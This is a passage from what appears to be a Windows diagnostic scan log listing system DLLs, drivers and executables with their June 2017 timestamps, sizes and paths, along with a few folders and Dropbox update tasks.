Corporation) C:\WINDOWS\system32\LicenseManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00899584 _____ 
(Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00741784 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll 2017-06-08 
09:54 - 2017-06-08 09:54 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2017-06-08 09:54 - 2017-06-08 09:54 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00527360 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 2017-06-08 09:54 - 2017-06-08 09:54 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00422400 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS 2017-06-08 09:54 - 2017-06-08 09:54 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00364032 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\msIso.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00314880 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\wcmcsp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00159744 
_____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-06-08 09:54 - 
2017-06-08 09:54 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx 2017-06-08 09:54 - 2017-06-08 09:54 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx 2017-06-08 09:54 - 2017-06-08 09:54 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-06-08 09:54 - 2017-06-08 09:54 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00027136 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Drivers\ksthunk.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys 2017-06-08 09:51 - 2017-06-08 09:51 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2017-06-08 09:51 - 2017-06-08 08:58 - 00000000 ____D C:\WINDOWS\ServiceProfiles 2017-06-08 09:48 - 2017-06-08 09:48 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\BestPractices 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\msmq 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\BestPractices 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\Reference Assemblies 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\MSBuild 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\MSBuild 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\inetpub 2017-06-08 09:48 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2017-06-08 09:48 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2017-06-08 09:17 - 2017-06-08 09:17 - 00000000 ____D C:\ProgramData\USOShared 2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagwrn.xml 2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagerr.xml 2017-06-08 09:08 - 2017-07-05 21:30 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-06-08 09:08 - 2017-06-08 09:08 - 00003760 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA 2017-06-08 09:08 - 2017-06-08 09:08 - 00003536 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore 2017-06-08 09:08 - 2017-06-08 09:08 - 00003482 _____ 